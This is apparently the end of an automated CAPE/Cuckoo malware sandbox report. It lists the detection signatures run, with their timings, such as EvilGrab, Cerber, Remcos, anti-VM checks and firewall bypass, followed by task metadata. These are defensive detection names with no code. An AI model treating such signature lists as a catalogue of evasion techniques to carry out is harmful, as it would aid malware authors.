  • 0.001 EvilGrab
  • 0.001 dep_disable
  • 0.001 neshta_files
  • 0.001 cerber_behavior
  • 0.001 antidbg_devices
  • 0.001 antivm_xen_keys
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 antivm_hyperv_keys
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 bypass_firewall
  • 0.001 packer_armadillo_regkey
  • 0.001 remcos_regkeys

Reporting ( 0.196 seconds )

  • 0.196 CompressResults
Task ID 94399
Mongo ID 5d9e846cc3c009112d67d9c9
Cuckoo release 1.3-CAPE
Delete